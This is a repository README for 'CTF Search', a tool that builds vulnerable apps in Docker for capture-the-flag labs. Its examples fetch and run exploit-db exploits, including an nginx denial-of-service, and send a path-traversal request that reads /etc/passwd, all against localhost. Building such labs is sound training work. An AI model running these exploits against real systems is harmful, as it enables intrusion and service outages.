Skip to content
Snippets Groups Projects
Select Git revision
  • fe6468268a771421e93cd0dbf925e89753c57e03
  • master default
2 results

ctf-search

  • Clone with SSH
  • Clone with HTTPS
    • user avatar
    Fix qemu boot path
    Timmy Chan authored
    fe646826
    History
    user avatar fe646826
    History
    Name Last commit Last update
    exploitdb
    .gitignore
    README.md
    README.md

    CTF Search

    Expands searchsploit with a -b (--build) option that tries to do an automatic download and setup of a vulnerable app in docker.

    Manual setup is also available. Manual setup downloads a vulnerable app if found, and lets the user select one of the template setups.

    When a template-setup is attempted (either auto or manual) the program tries to setup a docker container with the vulnerable app and it's dependencies. Note that a template-setup is only considered a general starting-point and will likely need manual modification: e.g. in Dockerfiles, docker-compose.yml, exposed ports, additional dependencies, etc.

    Dependencies

    Be sure to have installed the following: wget, unzip, tar, docker, docker-compose

    Setup

    CTFSearch uses python3. Be sure to install the required dependencies by running:

    pip3 install -r requirements.txt

    Usage - searchsploit:

    -b, --build  [EDB-ID]    Tries to find the app URL, then download and setup the vulnerable app in docker.

    Example:

    searchsploit -b 47044

    Usage (ctfcli.py ):

    python3 ctfcli.py build-auto
python3 ctfcli.py build-auto [EDB/CVE-ID]
python3 ctfcli.py build-manual
python3 ctfcli.py build-manual [EDB/CVE-ID]

    Alternative usage (ctfsearch.py):

    python3 ctfsearch.py [EDB-ID]
python3 ctfsearch.py [CVE-ID]
python3 ctfsearch.py

    Examples:

    python3 ctfcli.py build-auto 47044
python3 ctfcli.py build-manual 47044

python3 ctfsearch.py 47044
python3 ctfsearch.py CVE-2013-4238
python3 ctfsearch.py

    Supported Types

    WebApps:

    • Webapp PHP
    • Webapp Python
    • Webapp Linux

    WebServers:

    • Webserver Apache - user can specify version
    • Webserver Nginx - user can specify version

    OS - using docker host kernel:

    • Linux Debian (ssh access for user "ctf")
    • Linux Ubuntu

    OS - custom kernel:

    ###InProgress###

    Other:

    • Empty Dockerfile and docker-compose.yml

    Examples

    PHP WebApp (EDB-ID 48529)

    $ ./searchsploit -b 48529

    URL = host:port

    Port is found with "docker ps". Host is "localhost" or "ctf.idi.ntnu.no".

    Note: In dbConnection.php, change host url "localhost" to "db". This is commonly needed when setting up a PHP app with docker using ctfsetup. Manually fix any PHP or MySQL version or compatibility issues for this specific webapp.

    Linux App - Local (EDB-ID 152)

    Docker Host:

    $ ./searchsploit -b 152
$ docker up -it <contanter> /bin/sh

    Docker Container - Install:

    $ ./configure
$ make -ki
$ make install

    Docker Container - Exploit:

    $ wget https://www.exploit-db.com/download/152
$ mv 152 152.c
$ gcc 152.c
$ ./a.out

    Linux App - Remote (EDB-ID 14925)

    Docker Host:

    $ ./searchsploit -b 14925

Alter docker files to map ports host<->container if needed. 

$ docker up -it <contanter> /bin/sh
    or
$ docker up -it <contanter> bash

    Docker Container - Install:

    Change -lpthread to -pthread in Makefile.

$ make
$ ./weborf -p 8081 -b /var/log

    Docker Container, Docker Host or remote machine - Exploit:

    $ apt-get install -y curl
$ curl localhost:8081/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

    Adding a flag:

    A flag (in this case a file) can be added e.g. at root level: /secret.txt. The secret file with the flag is then found by doing a GET request to localhost:8081/..%2f..%2f..%2f..%2f..%2f..%2f..%2fsecret.txt.

    Apache Webserver (EDB-ID 132)

    Docker Host:

    $ ./searchsploit -b 132

Verify running container and note port number with
$ docker ps

Run exploit:
$ wget -O exploit.c https://www.exploit-db.com/download/132
$ gcc exploit.c
$ echo "qwerty" >> users.txt
$ echo "root" >> users.txt
$ echo "abcd" >> users.txt
$ echo "evil" >> users.txt
$ ./a.out -t localhost -p [port] -u users.txt

    Nginx Webserver (EDB-ID 25499)

    Docker Host:

    $ ./searchsploit -b 25499
Enter version number 1.4.0 when asked for a nginx version.

Verify running container and note port number with
$ docker ps

Visit webpage and verify it shows as expected.
127.0.0.1:[port]

run exploit
$ wget -O exploit.py https://www.exploit-db.com/download/25499
$ python exploit.py 127.0.0.1:[port]

Visit webpage and verify that it is not reachable due to DoS.
127.0.0.1:[port]